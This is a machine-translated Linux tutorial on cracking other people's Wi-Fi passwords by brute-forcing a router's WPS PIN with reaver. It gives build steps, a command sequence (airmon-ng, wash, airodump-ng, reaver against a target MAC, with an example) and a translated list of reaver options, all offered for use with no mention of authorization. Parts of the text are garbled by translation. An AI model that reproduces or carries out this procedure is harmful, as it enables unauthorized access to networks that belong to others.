This article mainly introduces the steps of using rip to crack wireless wifi password under linux, need friends can refer to the following tools: reaver
principle: Exhaustive PIN code to break the security of wireless routers
Installation:
Download source
Extract
tar-xzvf reaver-1.4.tar.gz
Install necessary software dependencies and tools< Br> Before you compile reaver, you need to install tools such as pcaplib, then you need aircrack-ng
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
compile and install
config And compile Reaver
cd reaver-1.4
cd src
./configure
make
Download aircrack-ng source code and compile
aircrack-ng from Ubuntu 12.04 version no longer It is included in the version of the software repository, but we can download its source code from the Internet to compile and install. If aircrack-ng already exists, you do not have to install it. ./configure
make
sudo install
Unpack tar -xzvf reaver-1.4.tar.gz
Install necessary software dependencies and tools
You need to install pcaplib before you compile reaver Tools, you need aircrack-ng sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
Compile and install
Configure and compile Reaver
cd reaver-1.4 cd src ./configure Make
Install Reaver
sudo make install
Method:
1 Input: airmon-ng start wlan0 Turn on the listening mode (the screen shows that the 8187L driver is successfully loaded – once loaded successfully!)
2 Input: wash -i mon0 -C View all wireless routers that open WPS for a long time no response Press Ctrl+C to end the process, then write down the destination routing MAC you want PJ.
3 Input: airodump-ng mon0 The NIC scans all channels &mdash in promiscuous mode; and displays all AP information (including AP signal strength, ESSID, MAC, channel, encryption, etc. …..), press Ctrl+C to end the scan.
Note: If you know the other party's wireless routing information, step 2, step 3 can be omitted!
4 Input: reaver -i mon0 -b MAC -a -S -vv Start the exhaust pin code
Note: You can press CTRL+C to exit the save process at any time, press the cursor control button "ld" on the next time ; then press Enter and the process can continue.
Combat I entered reaver -i mon0 -b MACD8:5D:4C:37:78:F6 -a -S -vv -d 0 (added -d 0 to speed up), see the screen flash … … cool!
reaver parameter details
required parameters
-i, –interface=<wlan> Name of the monitor-mode interface to use
NIC monitoring interface, usually mon0
-b , –bssid=<mac> BSSID of the target AP
AP MAC Address
Optional Arguments: Optional Parameters
-m, –mac=<mac> MAC of the host system < Br>Specify the local MAC address
-e, –essid=<ssid> ESSID of the target AP
The ESSID of the router, generally do not specify
-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)
The channel of the signal, if not specified, will automatically scan
-o, –out-file=<file> Send output to a log file [stdout]
Output log file
-s, –session=<file> Restore a previous session file
Recovery progress file
-C, –exec=<command> Execute the supplied command upon Successful pin recovery
Execute the command after pin success
-D, –daemonize Daemonize reaver
Set reaver to Daemon
-a, –auto Au To detect the best advanced options for the target AP
Automatically detect advanced parameters for the target AP
-f, –fixed Disable channel hopping
Disable channel jump
-5, –5ghz Use 5GHz 802.11 channels
Using 5G channels
-v, –verbose Display non-critical warnings (-vv for more)
Displaying unimportant warning messages -vv can show more
-q, – Quiet Only display critical messages
Show only key information
-h, –help Show help
Show help
Advanced Options: Advanced options
-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin
Use the specified 4-digit or 8-digit pin code
-d, –delay=<seconds> Set the delay between pin attempts [1]
pin Interval, default 1 second
-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
AP wait time after locking WPS
-g, –max-attempts=<num> Quit after num pin attempts
Maximum pin times
Reaver parameters
—Daily
-x, –f Ail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
10 waits after an unexpected failure, default 0 seconds
-r, –recurring-delay=<x: y> Sleep for y seconds every x pin attempts
waiting y seconds after every x pin
-t, –timeout=<seconds> Set the receive timeout period [5]
Packing timeout, Default 5 seconds
-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
M5/M7 timeout, default 0.2 seconds
-A, –no- Associate Do not associate with the AP (association must be done by another application)
Do not connect to the AP (there must be other procedures to complete the connection process)
-N, –no-nacks Do not send NACK messages when Out of order packets are received
Do not send NACK information (if you have been pinning, you can try this parameter)
-S, –dh-small Use small DH keys to improve crack speed
Use small DH Key value increase speed (recommended)
-L, –ignore-locks Ignore locked state reported by the target AP
Ignore The locked status reported by the AP
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet
Whenever an EAP failed packet is received, the WPS process is terminated
-n, –nack Target AP Always sends a NACK [Auto]
Always send NACK to the target AP, default auto
-w, –win7 Mimic a
Windows
7 registrar [False]
Simulate win7 registration, By default,
Ps: There are many factors affecting wireless, so the coordination between the parameters is very important. Of course, the most critical depends on the signal.
Principle details:
What is a PIN code?
A set of 8-digit string printed on the wireless router device label, of course, can exist in the wireless router management interface and can be changed.
What is the use of PIN?
In the supporting software of the wireless network card (such as TP-LINK QSS software), enter the 8-digit string on the wireless router device to successfully log in to the encrypted wireless router.
What does it mean to exhaust PIN?
Since you know the range of the wireless router PIN value (8-bit pure number), and most of the devices currently have WPS turned on, then the exhaustive PIN code to break the wireless router security protection is violent. *Theory*feasibility